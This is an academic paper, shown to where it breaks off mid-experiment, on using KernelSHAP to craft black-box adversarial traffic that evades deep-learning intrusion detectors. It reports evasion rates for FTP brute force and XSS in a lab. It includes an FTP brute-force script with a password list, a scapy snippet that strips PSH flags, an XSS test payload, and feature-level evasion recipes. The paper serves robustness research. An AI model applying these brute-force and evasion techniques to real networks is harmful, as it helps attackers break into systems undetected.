1 Introduction

Machine learning has become increasingly prevalent not only in academic and industrial research but also in society at large. It has been applied in areas such as image recognition, anomaly detection, text mining, and malware detection [10, 22, 31]. Among machine learning algorithms, deep learning (DL) in particular has gained significant attention for performance that equals or exceeds human capabilities in tasks such as natural language processing and decision-making. These advances in deep learning have been made possible by the availability of large datasets for training neural networks, as well as remarkable progress in hardware technology [38].

Recently, DL technologies have been introduced into cyber security products such as Network Intrusion Detection Systems (NIDS). NIDS play an important role in detecting attackers' malicious activities by monitoring network traffic. In the past, NIDS relied on signature-based techniques, which could detect only known attacks. With ML/DL, however, behavioral anomaly detection has flourished, and NIDS are therefore receiving growing attention [17, 32, 47, 49].

DL models have been shown to be vulnerable to adversarial attacks, in which attackers perturb the input data to cause a machine learning model to make incorrect predictions [14, 18, 24]. To evaluate and improve the robustness of machine learning models against such attacks, it is common to construct adversarial examples (AEs) that demonstrate an upper bound on robustness [3] and to design solutions for defending against them. This approach has led to a notable increase in studies focusing on generating AEs.

Feature-space attacks, where attackers only modify the feature vectors input to the classification model, are effective in the computer vision field, where the mapping from the image space (called the problem space in this paper) to the feature space is invertible or differentiable. In such cases, it is easy to find the perturbation in the problem space (real images) corresponding to a modification in the feature space (perturbed feature vectors), because each feature describes a pixel that can be reconstructed from the feature value. However, this inverse feature mapping problem is not as straightforward when perturbing feature vectors describing network traffic: the mapping from the problem space (raw network traffic) to the feature space in NIDS is neither invertible nor differentiable [36]. Furthermore, mapping back to the problem space is complicated by the need to verify not only that the proposed attacks are feasible in the problem space but also that the mutated malicious traffic retains its malicious properties and successfully executes its intended attack. Given these challenges, feature-space attacks cannot be directly applied to DL-based NIDS; alternative approaches must be developed to generate AEs specifically tailored for NIDS.

Recently, the connection between eXplainable Artificial Intelligence (XAI) and AEs has been pointed out [20, 21]. XAI offers a way to understand the decision-making processes of DL-based models [40]. In previous work [34], we showed that the interpretations given by XAI are useful for generating effective and feasible AEs against DL-based NIDS. We implemented an XAI-driven adversarial attack method and confirmed its feasibility and high evasion rate.

1.1 Contribution

In this paper, we propose new problem-space adversarial attacks on DL-based NIDS. In our proposed method, we identify features significantly contributing to detection evasion and determine how they should be perturbed by utilizing XAI. By focusing on important features and minimizing the number of perturbed features, we address the inverse feature mapping problem. Specifically, we find feasible transformations in the problem space that correspond to the perturbations in the feature space. This approach enables us to generate highly evasive AEs by fully utilizing the feature space information.

We also clarify the specific contributions of this paper relative to our previous work [34], which has several limitations. The first is that the method was a white-box approach, in which the attacker has full access to information about the targeted NIDS. Such a scenario has often been pointed out as impractical in previous studies [4, 11, 12]. The second limitation is that the evaluation was not convincing enough to show general effectiveness, because only one dataset (CIC-IDS2017) was used to construct the targeted NIDS model. In this paper, we address these drawbacks in the following ways:

  • By introducing an XAI method that does not utilize the internal information of the targeted AI, we improve the existing method from a white-box approach to a black-box approach.

  • To demonstrate the generalizability of our proposed method, we evaluated it across multiple NIDS models and attack scenarios.

Our proposed method is a black-box approach conducted in the problem space, making it more representative of real-world attack scenarios. Thus, it is useful for developers of DL-based NIDS. For instance, by executing realistic adversarial attacks using our approach, developers can perform practical robustness evaluations of their NIDS models. Furthermore, the adversarial examples generated by our method can be directly applied to adversarial training, enabling developers to strengthen their models’ robustness to such attacks.

1.2 Organization of the Paper

We introduce background information necessary for our research, such as adversarial attacks and XAI, in Sect. 2. Then, we introduce related research in Sect. 3. The white-box approach proposed in our previous work is explained in Sect. 4. Section 5 describes our proposals. We provide the experimental settings and describe the results in Sect. 6. Section 7 concludes this paper.

2 Background

2.1 DL-based NIDS

NIDS are designed to monitor network traffic for suspicious activities and potential threats. Unlike Host-based Intrusion Detection Systems (HIDS), which are installed on individual computers and monitor only the inbound and outbound packets of that particular host, NIDS are deployed at strategic points within the network to inspect all traffic in the network [2]. This makes NIDS particularly effective at detecting attacks that might not be visible at the host level, such as distributed denial-of-service (DDoS) attacks. Early NIDS mainly used hand-crafted signatures. Recently, however, NIDS have adopted behavioral anomaly detection, typically based on ML/DL techniques, and have become able to detect unknown malicious traffic [5].

An important aspect of DL-based NIDS is their classification capability. They can be configured for binary classification, distinguishing between benign and malicious traffic, or for multi-class classification, which involves identifying the specific type of attack. Training methods also differ depending on the required capability. For instance, supervised learning on "mixed datasets" containing both benign and malicious traffic is often adopted to train multi-class models. This approach is similar to signature-based detection, but with the signatures learned automatically via ML/DL. Meanwhile, if an NIDS model performs anomaly detection, it can be trained on datasets consisting solely of legitimate traffic.

2.2 Adversarial Examples

AEs cause misclassification in a machine learning model by manipulating its input data. The attacker perturbs the input so that it crosses a decision boundary and is misclassified. This attack can be formulated as follows [46]:

$$\begin{aligned} \text {minimize} \quad&\Vert x' - x\Vert \\ \text {subject to} \quad&f(x') = l', \\&f(x) = l, \\&l \ne l', \\&x' \in [0,1]^m, \end{aligned}$$
(1)

where \(x \in [0,1]^m\) is an input to a classifier f, l is the correctly predicted class for x, and \(l' \ne l\) is the target class for \(x' = x+r\), with \(r \in [0,1]^m\) being a small perturbation to x.
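
For intuition, the following minimal PyTorch sketch crafts a one-step gradient-sign perturbation in the spirit of the gradient-based attacks cited in Sect. 3. It is a heuristic for finding a small r that flips the prediction, not an exact minimizer of (1), and the differentiable classifier model and the batched tensors x and label are illustrative assumptions.

    import torch
    import torch.nn.functional as F

    def fgsm_perturb(model, x, label, eps=0.05):
        # One-step gradient-sign perturbation: seeks a small r such that
        # f(x + r) != f(x); a heuristic approximation of formulation (1).
        x = x.clone().detach().requires_grad_(True)
        loss = F.cross_entropy(model(x), label)
        loss.backward()
        x_adv = x + eps * x.grad.sign()        # perturbation r = eps * sign(grad)
        return x_adv.clamp(0.0, 1.0).detach()  # keep x' in [0, 1]^m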

Adversarial attacks are also classified based on the information available to the attacker. If an attacker knows all information, including input and output data, as well as the weights and classification labels of the target model, the attack is deemed a white-box attack. On the other hand, an attack conducted under conditions where the attacker only has access to information about the input/output data is called a black-box attack. Gray-box attacks lie in between white-box and black-box attacks, where the attacker possesses partial knowledge or limited access to the victim model.

2.3 Explainable Artificial Intelligence

In recent years, DL-based systems have been increasingly deployed across many domains. However, the non-linear nature of deep learning models, particularly those involving multiple layers of transformations, makes their decision-making processes opaque and difficult to interpret. In other words, these models can capture complex patterns, but the intricate, non-linear relationships between inputs and outputs often form "black boxes" whose reasoning is not easily understood. This opacity is why XAI has attracted so much attention in recent years: XAI provides helpful information for understanding the decision-making process of ML or DL systems.

KernelSHAP [27], a method introduced for explaining the predictions of any machine learning model, is based on Shapley values from cooperative game theory. Formally, let a function \( f: {\mathbb {R}}^n \rightarrow {\mathbb {R}} \) represent a machine learning model, and an input \( x \in {\mathbb {R}}^n \). KernelSHAP estimates the contribution of each feature to the final prediction by considering all possible subsets of the input features and computing the average marginal contribution of a feature across these subsets. The Shapley value \( \phi _i \) for a feature \( x_i \) is defined as:

$$\begin{aligned} \phi _i = \sum _{S \subseteq N \setminus \{i\}} \frac{|S|!(|N|-|S|-1)!}{|N|!} \left( f(S \cup \{i\}) - f(S) \right) \end{aligned}$$

where \( N \) is the set of all features, \( S \) is a subset of \( N \) that does not include \( i \), and \( f(S) \) represents the prediction of the model when only the features in \( S \) are present. One significant advantage of KernelSHAP is that it does not require any internal information about the model, such as weights, gradients, or biases. This makes KernelSHAP a model-agnostic approach. In this paper, we adopt KernelSHAP as it can be applied to any machine learning model, making it a versatile tool for interpreting our targeted NIDS model, which uses tabular data.
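
As a concrete illustration, the following snippet estimates Shapley values for a tabular input using the open-source shap package (our experiments in Sect. 6 use the Xplique implementation instead). Here model is a hypothetical fitted classifier exposing a scikit-learn-style predict_proba method, X_background is a small sample of training rows used as the baseline, and x is one input row.

    import numpy as np
    import shap  # pip install shap

    # Model-agnostic KernelSHAP: only model inputs/outputs are needed.
    explainer = shap.KernelExplainer(model.predict_proba, X_background)

    # Shapley-value estimates for one tabular input x (shape: (1, n_features)).
    shap_values = explainer.shap_values(x, nsamples=200)
    print(np.round(shap_values, 4))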

3 Related Research

3.1 DL-based IDS/NIDS

Intrusion Detection Systems (IDS) are essential tools for detecting malicious activities in cyber environments [19]. IDS are typically categorized into Host-based IDS (HIDS), which operate on individual devices, and Network-based IDS (NIDS), which monitor traffic across networks [33]. In recent years, DL techniques have gained a lot of attention in the development of IDS/NIDS due to their ability to automatically learn complex patterns and features from large-scale network data. The application of DL in IDS/NIDS has shown promising results across various domains such as IoT [48], automobiles [23], and ICS [16].

Of these various types of IDS, we focus on DL-based NIDS in this study, an area that has attracted considerable research effort. Zhang et al. [52] proposed an MSCNN-LSTM model that integrates spatial and temporal feature extraction to improve detection accuracy on the UNSW-NB15 dataset. Sowah et al. [42] utilized artificial neural networks (ANN) for intrusion detection in mobile ad hoc networks (MANETs), demonstrating effective attack prevention and node reconfiguration. Diro et al. [8] leveraged LSTM networks for distributed attack detection in fog-to-things communications, emphasizing scalability and lightweight solutions for IoT environments. Yahalom et al. [51] addressed the high false positive rates of anomaly-based IDS by exploiting hierarchical data structures to enhance practical deployment. Sun et al. [44] introduced TDL-IDS, employing transfer learning to overcome the challenge of limited labeled data in real-world scenarios.

3.2 Adversarial Attacks against DL-based NIDS

We categorize and introduce existing research on adversarial examples for DL-based NIDS into feature-space attacks and problem-space attacks. This categorization allows us to clarify the differences between our study and previous works, thereby highlighting our contributions.

In the field of adversarial attacks targeting ML-based NIDS, feature-space attacks assume the ability of attackers to modify feature vectors input to NIDS directly. Starting with white-box attacks, existing gradient-based AE generation algorithms were applied to evade a DL-based NIDS [30, 50]. Techniques for bypassing a particular NIDS model, Kitsune [32], were proposed by Clements et al. [6]. Additionally, strategies for circumventing GAN-based NIDS detection are introduced by Piplai et al. [37]. There also exist gray- and black-box attacks. A boundary-based method designed to produce AEs for DoS attacks was proposed by Peng et al. [35], and a method for generating AEs against botnet detectors by introducing random mutations to features was presented by Apruzzese et al. [1]. Lin et al. [26] developed a GAN-based approach to generate AEs without any knowledge of the NIDS’s internal structure or parameters.

Problem-space attacks directly modify or transform network traffic to evade detection. Hashemi et al. [13] proposed a white-box attack method against multiple NIDS models; the maximum evasion rate of their method against flow-based NIDS is limited to 68%. Regarding gray-box attacks, Stinson et al. [43] proposed techniques that evade botnet detection by introducing random mutations based on knowledge of the detection algorithm and its implementation. Homoliak et al. [15] proposed random obfuscation techniques for evading detection by various classifiers. Han et al. [12] proposed a black-box attack that preserves the maliciousness of attack communications while being generic and incurring minimal overhead.

First, feature-space attacks cannot be directly converted to actual network traffic because feature extraction in DL-based NIDS is not always invertible [12]; their feasibility is therefore limited, and they are impractical. Problem-space attacks are more practical, but existing ones have several drawbacks compared to our proposed method. Firstly, Hashemi et al.'s method [13] is a problem-space white-box attack, and its evasion rate is only 68% at most. Second, since other existing attacks do not fully utilize the information in the feature space, they must add a relatively large amount of random perturbation to the attack communication. In contrast, our method uses XAI to select important features and finds modifications in the problem space that perturb them in the feature space. As a result, the modifications in the problem space are minimal enough to preserve both the feasibility of the AEs and the maliciousness of the original attack traffic.

4 XAI-driven White-box Attacks on NIDS

In this section, we introduce the details of the XAI-driven white-box attack method we proposed in [34].

4.1 Targeted NIDS and Threat Model

The attack method focuses on generating AEs against DL-based NIDS. General DL-based NIDS detection flow is described in Fig. 1. First, using a packet-capturing tool, traffic in the target network is captured. Next, features are extracted from captured raw traffic. If necessary, the extracted features are pre-processed for shaping. Finally, the extracted and shaped data are input to the NIDS model, and the model returns a binary value (0: benign, 1: malicious).

In this attack method, we assume a white-box attack scenario, where the attacker possesses full access to the internal details of the targeted NIDS model. Specifically, the attacker is assumed to have detailed knowledge of the model’s architecture, including the number and type of layers, weights, biases, activation functions, and hyperparameters. Furthermore, the attacker understands the feature set used by the NIDS, such as extracted network traffic characteristics, and the process by which these features are derived from raw traffic.

Fig. 1: General flow of DL-based NIDS

4.2 Details of the Attack Method

To achieve a high evasion rate for the generated AEs, it is important to fully utilize information in the feature space. Therefore, our method identified effective perturbations in the feature space and then sought corresponding transformations in the problem space. However, there is an inverse feature mapping problem in the network domain: feature extraction functions are non-invertible and non-differentiable [36]. Due to this problem, the larger and more complex the perturbations in the feature space, the more difficult it becomes to find the corresponding problem-space transformations. To address this, we minimized the number of features perturbed in the feature space, thereby simplifying the feature-space perturbations. This approach also made our AEs more robust to pre-processing. To implement effective AEs with a minimal number of perturbed features, we utilized XAI to identify key features that significantly contribute to evading detection. Additionally, to maintain semantics, we focused on perturbing the more independent features among those selected.

Our method consists of the following five major steps.

  1. We test the model and analyze False Negative (FN) samples using Integrated Gradients [45] as an XAI technique. Then, we select the top k most important features contributing to the targeted model's decision on FN samples. In this research, we deal with the case where \(k = 3\).

  2. We plot True Positive (TP) samples and FN samples in a k-dimensional graph whose axes are the top k features.

  3. We calculate a correlation heatmap [29] and confirm how independent each important feature is.

  4. From the 3D graphs and the heatmap, we select the most suitable feature to be perturbed.

  5. We implement the perturbations (AEs) in the real environment and confirm whether they retain their original maliciousness.

In Step (1), we utilize Integrated Gradients, which requires internal information about the targeted AI model, such as weights and biases. Thus, this method is a so-called "white-box attack." In Steps (1) and (2), we focus on FN and TP samples, because our goal of generating AEs amounts to transforming TPs into FNs. In Step (2), we plot, for instance, a graph like Fig. 2. This figure shows that TP samples are concentrated at the lower end of each axis, while some FN samples sit at higher values on the feature B or C axes. From these analyses, we can hypothesize that when generating AEs, we should increase the value of B or C for the malicious communication (in the direction of the white arrows in Fig. 2). For instance, if B is 'URG flag Count,' an attacker might send more packets with the URG flag or set the URG flag on attack packets to increase the feature value. Furthermore, if feature B is more independent than feature C, we select B as the most suitable feature to be perturbed in Step (4).

Fig. 2: Sample 3D scatter plot: 3D distribution of True Positive (TP) and False Negative (FN) samples along the top three important features (A, B, C). TP samples cluster at the lower ends of the axes, while some FN samples are at higher values on the B or C axes. The white arrows indicate the direction in which feature manipulation could generate adversarial examples (AEs)

4.3 Evaluation

In our evaluation, we verified whether cyberattacks perturbed by our proposed method could evade detection by implementing them in a real-world network environment. To prepare our targeted DL-based NIDS model, we trained it on a large-scale existing dataset and then fine-tuned it on a smaller set of network data generated in our real network environment. For this process to be effective, it was important to minimize the gap between the existing dataset and the data generated in the real network environment. With this in mind, we chose the CIC-IDS2017 dataset [41] as training data because it provides detailed attack labels and descriptions of attack scenarios, which allowed us to closely replicate specific attack scenarios in our environment.

Our proposed method focuses on generating adversarial examples in the problem space. This means the selected attacks needed to be reproducible in our network environment. Although CIC-IDS2017 includes various attack scenarios, such as Brute Force, DoS, Heartbleed, Web Attack, Infiltration, Botnet, and DDoS, we chose XSS and Brute Force because their attack scenarios were easier to interpret than those of other attacks. Furthermore, the two attacks have different characteristics: Brute Force is a common network-layer attack, while XSS targets the application layer. Using these two attack types allowed us to evaluate our method across different network layers.

We perturbed the two types of attack samples in an actual network environment and assessed the extent to which the resulting AEs could evade detection by the NIDS model. The method attained evasion rates of 95.7% (Brute Force) and 100.0% (XSS), showing that the white-box attack method can generate highly evasive AEs against DL-based NIDS.

5 Our Proposal: XAI-driven Black-box Attacks on NIDS

In this section, we introduce our proposals. First, we identify two major drawbacks in the previous work [34] introduced in Sect. 4. Then, we explain the details of how our proposals address these limitations.

5.1 Limitations of the Previous Work

Impractical Attack Scenario: In the previous work, we used Integrated Gradients as an XAI method to measure the importance of features (Step 1 of our method introduced in Sect. 4.2). Integrated Gradients require not only the input and output information of the AI model being analyzed but also the gradient information. Consequently, the method introduced in Sect. 4.2 assumed a white-box scenario where the attacker has access to the internal information of the target NIDS model. However, in real-world attack scenarios, it is rare for attackers to have such access. Therefore, a white-box approach is not suitable for investigating the realistic robustness of DL-based NIDS against adversarial attacks.

Limited Evaluation Scope: Another drawback is the inadequate evaluation of the method's generalizability. In the previous work, we implemented the white-box attacks and perturbed two types of attacks (XSS and Brute Force) to see whether they could evade detection by an NIDS based on the CIC-IDS2017 dataset. However, this is insufficient to claim generalizability; demonstrating it requires validating the method across multiple datasets and different NIDS models.

5.2 Details of Our Proposals

In order to address the two drawbacks described in Sect. 5.1, we improve the existing work in the following two points.

First, to achieve more realistic and feasible adversarial attacks against DL-based NIDS, we improve the existing method by using KernelSHAP instead of Integrated Gradients to select important features. KernelSHAP does not need any of the target model's internal information, such as gradients. This allows us to extend the existing method to a black-box approach, contributing to a more practical evaluation of the robustness of DL-based NIDS against adversarial attacks than the existing methods provide.

Second, to demonstrate the generalizability of our proposed method, we evaluate it on multiple NIDS models. We implement our adversarial attacks not only against the NIDS based on the CIC-IDS2017 dataset, which was examined in previous research, but also against an NIDS based on the TON_IoT dataset [25]. Both TON_IoT and CIC-IDS2017 are highly relevant and widely used NIDS benchmark datasets, yet they have different feature sets and distinct data contents. By evaluating the effectiveness of our proposed method on NIDS based on these different datasets, we show that our method is generalizable and not dependent on specific datasets or scenarios.

5.3 Flow of XAI-driven Black-box Attacks on NIDS

We describe the detailed steps of our proposed XAI-driven black-box adversarial attacks. Similar to the white-box attack previously proposed and described in Sect. 4, this black-box attack method aims to generate effective AEs with a minimal number of perturbed features. To achieve this, we utilize XAI to identify important features that significantly contribute to evading detection. While the existing method described in Sect. 4.2 used Integrated Gradients as the XAI model, our proposed method employs KernelSHAP instead, enabling a black-box approach. A code sketch of the feature-selection part of this pipeline follows the list below.

  1. We test the model and analyze False Negative (FN) samples using KernelSHAP as an XAI technique. Then, we select the top k most important features contributing to the targeted model's decision on FN samples. In this research, we deal with the case where \(k = 3\).

  2. We plot True Positive (TP) samples and FN samples in a k-dimensional graph whose axes are the top k features.

  3. We calculate a correlation heatmap [29] and confirm how independent each important feature is.

  4. From the 3D graphs and the heatmap, we select the most suitable feature to be perturbed.

  5. We implement the perturbations (AEs) in the real environment and confirm whether they retain their original maliciousness.
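
To make steps 1, 3, and 4 concrete, the following sketch automates the feature selection on tabular data. In our experiments, the 3D-plot inspection (step 2) and the final choice were performed manually, so the mean-correlation criterion here is only an illustrative proxy; shap_values and fn_df are hypothetical inputs.

    import numpy as np
    import pandas as pd

    def select_feature_to_perturb(shap_values, fn_df, k=3):
        # shap_values: array (n_FN_samples, n_features) from KernelSHAP
        # fn_df: DataFrame of the same FN samples (columns = feature names)
        mean_impact = np.abs(shap_values).mean(axis=0)                # step 1
        top_k = pd.Series(mean_impact, index=fn_df.columns).nlargest(k).index
        corr = fn_df.corr().abs()                                     # step 3
        # step 4 proxy: prefer the top-k feature least correlated, on
        # average, with all other features ("most independent")
        independence = {f: corr[f].drop(f).mean() for f in top_k}
        return min(independence, key=independence.get)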

6 Experimental Results and Discussion

We implemented our proposed method described in Sect. 5 and perturbed two types of attacks, Brute Force attacks and Cross-Site Scripting (XSS), in an actual network environment. We prepared two types of NIDS models with different sets of input features and measured the evasion rates of the generated adversarial examples against each model. In this section, we first explain our experimental environment and implementation details of the targeted NIDS model. Then, we show the experimental results of the two attack cases and finally discuss the results.

6.1 Environment Settings

We need a real network environment to measure the performance (feasibility and detection evasion rate) of the proposed black-box attacks described in Sect. 5. In this environment, an attacker host (Kali Linux) and a victim server (CentOS) are set up on the same network so that they can communicate with each other (Fig. 3). Both machines are virtual machines running on VMware Fusion. All network traffic actually occurred and was captured using Wireshark. Feature extractors then extract features from the collected data. To maintain feature consistency with the training datasets used to build the base models of our targeted NIDS, we adopted CICFlowMeter for the CIC-IDS2017-based model and Zeek (Bro) for the TON_IoT-based model.

Fig. 3: Network settings

6.2 Targeted NIDS Model

Our targeted NIDS models consist of an input layer, two hidden layers (each with 256 neurons), and an output layer. During training, we compute the cross-entropy between the labels and predictions as the loss function. The Adam optimizer (Adaptive Moment Estimation) is used with a learning rate of 0.01. This architecture is typical of a feedforward neural network and was also adopted in previous work [30]. To construct an NIDS model with sufficient accuracy, we need a sufficiently large and varied set of training data, which was difficult to generate in our own environment. Therefore, we first trained the targeted model on public datasets, which contain a high volume of traffic, and then fine-tuned it with benign and malicious data generated from our environment to build the final NIDS model. To evaluate the generalizability of our proposed method, we prepare NIDS models based on different datasets: a CIC-IDS2017-based model and a TON_IoT-based model.
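
A sketch of this architecture in PyTorch is shown below. The paper does not name the framework or the activation function, so PyTorch and ReLU are assumptions, and the feature count of 78 is illustrative.

    import torch
    import torch.nn as nn

    def build_nids_model(n_features: int) -> nn.Module:
        # Feedforward network: input -> 256 -> 256 -> 2 output logits.
        return nn.Sequential(
            nn.Linear(n_features, 256), nn.ReLU(),   # hidden layer 1
            nn.Linear(256, 256), nn.ReLU(),          # hidden layer 2
            nn.Linear(256, 2),                       # benign / malicious
        )

    model = build_nids_model(n_features=78)          # 78 is illustrative
    criterion = nn.CrossEntropyLoss()                # cross-entropy loss
    optimizer = torch.optim.Adam(model.parameters(), lr=0.01)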

We apply the following pre-processing to the datasets and to the data collected from our network environment (a code sketch follows the list):

  • Feature removal: We removed features corresponding to Flow ID, Src IP, Src Port, Dst IP, Dst Port, and Timestamp because they are flow identifiers which could lead to erroneous shortcut learning of DL-NIDS [7]. We also calculated the ratio of missing values for each feature and removed those with a missing value ratio exceeding 50%.

  • Missing value handling: After the feature removal, we employed imputation techniques on the remaining features. For categorical features with missing values, we used the most frequent value for imputation. Numeric features with missing values were imputed using the mean.

  • Min-Max normalization: We normalized the data to ensure that features with larger values do not bias the classification process. This normalization scales the feature values to a [0, 1] range.

  • Binary labels: For each attack type, we merge multiple attack categories into a single label. For instance, when dealing with brute force attacks (Sect. 6.3), we place both the FTP and SSH brute force labels of CIC-IDS2017 under one label, malicious. As a result, we obtain binary labels: "benign" and "malicious."
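
The sketch below outlines these pre-processing steps with pandas and scikit-learn. Column names follow CIC-IDS2017 conventions; the binary-label mapping is left as a comment since label names differ per dataset.

    import pandas as pd
    from sklearn.impute import SimpleImputer
    from sklearn.preprocessing import MinMaxScaler

    ID_COLS = ["Flow ID", "Src IP", "Src Port", "Dst IP", "Dst Port", "Timestamp"]

    def preprocess(df: pd.DataFrame) -> pd.DataFrame:
        df = df.drop(columns=[c for c in ID_COLS if c in df.columns])
        df = df.loc[:, df.isna().mean() <= 0.5]   # drop features >50% missing
        num = df.select_dtypes(include="number").columns
        cat = [c for c in df.columns if c not in num]
        df[num] = SimpleImputer(strategy="mean").fit_transform(df[num])
        if cat:
            df[cat] = SimpleImputer(strategy="most_frequent").fit_transform(df[cat])
        df[num] = MinMaxScaler().fit_transform(df[num])   # scale to [0, 1]
        # Binary labels are derived separately, e.g. for CIC-IDS2017:
        # df["Label"] = (df["Label"] != "BENIGN").astype(int)
        return df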

6.3 Experiment 1: Brute Force Attack

We trained two types of NIDS models: one based on the CIC-IDS2017 dataset and the other on the TON_IoT dataset. We then fine-tuned each model using benign and malicious data generated in our actual network environment as follows:

  • Benign traffic: Legitimate client logins to an FTP server (vsftpd), along with file uploads and downloads.

  • Malicious traffic: FTP Brute Force attacks using FTP-Patator, which is also used in creating CIC-IDS2017 dataset [41].

After fine-tuning, we tested the models with test data collected from the real environment. As shown in Table 1, they classified benign and malicious traffic with high accuracy.

Table 1: Targeted NIDS model performances

6.3.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

We generated AEs of Brute Force attacks using our proposed method. The following enumerated items correspond to the steps in Sect. 5.3.

  1. Using XAI, we analyzed the FN samples. We used the KernelSHAP implementation from Xplique [9] to calculate each feature's mean impact over all FN samples. We selected the top 20 features in order of impact and plotted them in Fig. 4. From this figure, we focused on the top three most important features: Fwd PSH Flags, Avg Packet Size, and SYN Flag Count. The descriptions of these three features are as follows [41]:

    • Fwd PSH Flags: Number of times the PSH flag was set in packets traveling in the forward direction (0 for UDP).

    • Avg Packet Size: Average size of packet.

    • SYN Flag Count: Number of packets with SYN.

  2. We created a three-dimensional graph (see Fig. 5). From this 3D scatter plot, it was clear that Fwd PSH Flags was more suitable for perturbation than the other two features. Specifically, reducing its value would likely shift TPs to FNs.

  3. We checked the independence of each feature by creating a heatmap (Fig. 6) of their correlations. The figure showed that Fwd PSH Flags had only a weak correlation with the other features. Our qualitative analysis also revealed that Fwd PSH Flags, being a count of TCP flags in the forward direction (from client to server), had little relation to the other flow features.

  4. Based on the analyses of Figs. 5 and 6, we decided to generate adversarial examples by perturbing Fwd PSH Flags to 0.

  5. We implemented Python scripts to perform FTP Brute Force attacks without setting the PSH flag; that is, the PSH flag is 0 for all packets sent from the attacker (an illustrative sketch follows below). We confirmed that the perturbed attacks still worked successfully.
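
For illustration, the following scapy sketch applies the same transformation offline by clearing the PSH bit in a captured trace. The live attack in our experiments instead used custom FTP client scripts that never set the flag; the pcap file names here are hypothetical.

    from scapy.all import rdpcap, wrpcap, IP, TCP

    PSH = 0x08                                     # TCP PSH flag bit

    packets = rdpcap("ftp_bruteforce.pcap")        # hypothetical capture file
    for pkt in packets:
        if TCP in pkt and pkt[TCP].flags & PSH:
            pkt[TCP].flags = int(pkt[TCP].flags) & ~PSH  # clear PSH only
            del pkt[TCP].chksum                    # force checksum recomputation
            if IP in pkt:
                del pkt[IP].chksum
    wrpcap("ftp_bruteforce_no_psh.pcap", packets)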

Fig. 4: Feature importance for NIDS FN samples in Brute Force attacks (CIC-IDS2017-based model)

Fig. 5: 3D scatter plot of TP and FN samples in Brute Force attacks (CIC-IDS2017-based model)

Fig. 6: Correlation matrix of features in Brute Force attacks of CIC-IDS2017

Our proposed AEs did not affect the original maliciousness of the attacker traffic at all. To evaluate their impact, we measured the evasion rate (i.e., the fraction of malicious communications misclassified as benign). The evasion rate was 95.65%, indicating that our adversarial examples evade detection with fairly high probability.
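
For reference, a minimal sketch of this metric on hypothetical model decisions:

    import numpy as np

    preds = np.array([0, 0, 1, 0])   # illustrative NIDS decisions on perturbed
                                     # malicious flows (0 = benign, 1 = malicious)
    evasion_rate = float(np.mean(preds == 0))   # fraction judged benign
    print(f"Evasion rate: {evasion_rate:.2%}")  # 75.00% for this toy example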

6.3.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as in Sect. 6.3.1, we generated AEs for the TON_IoT dataset-based model.

  1. We analyzed the FN samples using XAI. The results are presented in Fig. 7. Based on the feature importance ranking in the graph, the top three features are conn_state, service, and src_ip_bytes. However, conn_state represents the status and progress of a connection (whether it is established, in progress, or terminated), making it difficult to perturb. Similarly, service, which denotes the application protocol, is part of a flow identifier and therefore out of the perturbation scope. We thus considered the fourth most important feature, src_pkts, and the fifth, proto. However, proto, which represents the transport-layer protocol (TCP or UDP), is likewise part of a flow identifier and impossible to perturb. We therefore finally selected src_ip_bytes, src_pkts, and dst_ip_bytes. The detailed explanations of these three features are as follows:

    • src_ip_bytes: Number of IP bytes sent by the FTP client.

    • src_pkts: Number of packets sent by the client.

    • dst_ip_bytes: Number of IP bytes sent by the FTP server.

  2. We plotted the TP and FN samples in 3D space, as shown in Fig. 8. The FN samples are concentrated near the origin of the graph. Consequently, by perturbing TP samples to reduce the value of the most important feature, src_ip_bytes, we can efficiently make them evade detection by the NIDS.

  3. The heatmap (Fig. 9) showed that src_ip_bytes is correlated with other features, but no more strongly than the other candidates. Qualitatively, a perturbation that reduces src_ip_bytes also affects src_bytes and src_pkts.

  4. Both src_ip_bytes and src_pkts have similar correlations with other features and share similar characteristics, so either could be perturbed. However, src_ip_bytes had a bigger impact on the FN samples than src_pkts, so we decided to perturb src_ip_bytes.

  5. We implemented the perturbation in the problem space by terminating the TCP session after each login attempt with a username and password pair (a sketch follows below). Despite these perturbations, all Brute Force attacks were successful.
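
A minimal sketch of this transformation using Python's ftplib is shown below; the host address and wordlist are hypothetical placeholders. Opening a fresh connection for every guess splits the attack into many short flows, keeping each flow's src_ip_bytes small.

    from ftplib import FTP, error_perm

    def attempt(host: str, user: str, password: str) -> bool:
        # One guess per fresh TCP session, so each flow carries a single
        # attempt and per-flow src_ip_bytes stays small.
        ftp = FTP(host, timeout=5)       # new connection = new flow
        try:
            ftp.login(user, password)
            return True
        except error_perm:               # 530: login incorrect
            return False
        finally:
            ftp.close()                  # terminate the session

    for pw in ["123456", "password", "letmein"]:   # illustrative wordlist
        if attempt("192.0.2.10", "admin", pw):     # hypothetical target
            print("valid password:", pw)
            break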

Fig. 7: Feature importance for NIDS FN samples in Brute Force attacks (TON_IoT Dataset-Based Model)

Fig. 8: 3D scatter plot of TP and FN samples in Brute Force attacks (TON_IoT Dataset-Based Model)

Fig. 9: Correlation matrix of features in Brute Force attacks of TON_IoT Dataset

To evaluate the performance of the perturbed AEs, we measured the evasion rate, which was 100%, indicating that our adversarial examples completely bypassed detection by the TON_IoT dataset-based model.

6.4 Experiment 2: XSS

In the XSS attack case, we prepared two types of NIDS models using the same methodology described in Sect. 6.3. We then constructed a real-world environment for data collection to fine-tune the models. We set up a web server using Apache and prepared a simple e-commerce site, deliberately leaving an XSS vulnerability on the login page. For example, if an attacker entered <script>alert('xss');</script> in the username field of the login form, a JavaScript alert, as depicted in Fig. 10, would appear on the screen. The data collected in this environment include:

  • Benign traffic: Legitimate client logins and subsequent page browsing.

  • Malicious traffic: Various inputs of XSS vectors from [39] to the login page.

After fine-tuning, we evaluated the performance using test data, as shown in Table 1, confirming the models' high accuracy in classifying communications.

Fig. 10: Login page after XSS

6.4.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

The following enumerated items correspond to the steps in Sect. 5.3.

  1. The XAI analysis results for the FN samples are shown in Fig. 11. From this figure, we selected the top three features: Fwd Seg Size Min, URG Flag Count, and Bwd Packet Length Min. The detailed descriptions of these three features are as follows:

    • Fwd Seg Size Min: Minimum segment size observed in the forward direction.

    • URG Flag Count: Number of packets with URG flag.

    • Bwd Packet Length Min: Minimum size of packet in backward direction.

  2. We plotted the TP and FN samples in 3D space, as shown in Fig. 12. The graph revealed that Fwd Seg Size Min was the most critical and easiest-to-perturb feature for generating adversarial examples. Specifically, increasing its value appears to turn TPs into FNs.

